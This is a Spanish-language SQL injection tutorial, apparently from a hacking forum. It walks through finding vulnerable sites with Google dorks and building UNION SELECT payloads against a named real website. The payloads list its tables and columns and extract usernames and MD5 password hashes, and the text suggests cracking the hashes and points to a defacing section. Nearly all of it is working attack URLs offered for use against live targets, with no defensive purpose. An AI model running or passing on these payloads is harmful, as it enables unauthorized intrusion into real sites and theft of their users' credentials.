Que es SQL Injection?
SQLI(SQL Injection) ocurre cuando se inyecta un codigo malicioso dentro de otro que seria el error, entonces saca los datos.
1- Buscar webs vulnerables a SQLI
Para eso usaremos dorks de google
Ej:
allinurl:*.org/noticias.php?idnoticia=* (Asterisco sirve para definir cualquier cosa)
Una vez la tenemos en idnoticia=(saldran numeros o algo pondremos: ') quedaria: www.ppzamora.es/_archivo/noticia.php?id='
Si sale un mensaje de error tipo: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in o You have a error in your syntax o parecido
2-Sacando datos:
Ahora para sacar las columnas y las tablas vamos a ir escribiendo numeros asi: 1,2,3,4 etc..
Ej:
www.ppzamora.es/_archivo/noticia.php?id=-1+union+all+select+0,1,2 y asi hasta que nos tire unos numeros
que serian estos numeros:
www.ppzamora.es/_archivo/noticia.php?id=-1+union+all+select+0,1,2,3,4
3- Sacando Tablas:
Ahora vamos a elejir un numero yo elijo el 3 y vamos a quitar el 3 y pondremos esto:
www.ppzamora.es/_archivo/noticia.php?id=-1+union+all+select+0,1,2,group_concat(table_name),4+from+information_schema.tables
group_concat(table_name) emos añadido donde avia el numero 3 y al final emos añadido: +from+information_schema.tables
Estos codigos sirven para ver las tablas que ahi.
4- Sacando tablas:
Ahora para sacar las tablas vamos a buscar una tabla que parezca importante como: admin,usuarios,administrador,login,acces,opciones,config y tablas asi.
Yo encontre la tabla Usuarios
Recuerda que hasta la tabla "VIEWS" Son las de defecto, asi que empieza a mirar a partir de esa
y ahora vamos a poner:
www.ppzamora.es/_archivo/noticia.php?id=-1+union+all+select+0,1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=char(85,83,85,65,82,73,79,83)
Emos cambiado el donde avia el 3 y emos añadido: group_concat(column_name) y al final esto: +from+information_schema.columns+where+table_name=char (85,83,85,65,82,73,79,83)
Estos codigos del final es USUARIOS encriptado en ASCII y para encriptar usaremos el encriptador que ahi en /defacing abajo del todo y encriptaremos el nombre de la tabla
5- Ahora nos va a salir esto: ID_USUARIO,NOMBRE,USUARIO,PASSWORD,OBSERVACIONES y vamos a cojer usuario y password lo vamos a poner:
www.ppzamora.es/_archivo/noticia.php?id=-1+union+all+select+0,1,2,group_concat(usuario,0x3a3a,password),4+from+USUARIOS
vamos a cambiar otra vez donde avia el 3 y e puesto esto: group_concat(usuario,0x3a3a,password) que seriae l usuario y password que cojimos antes
ahora al final vamos a poner +from+(nombre de la tabla que elejimos en nuestro caso seria USUARIOS) y entramos y saldria las passwords en este caso
estan encriptadas en MD5, las buscas en google y aveces salen o en programitas
Editado por: 3rr0r
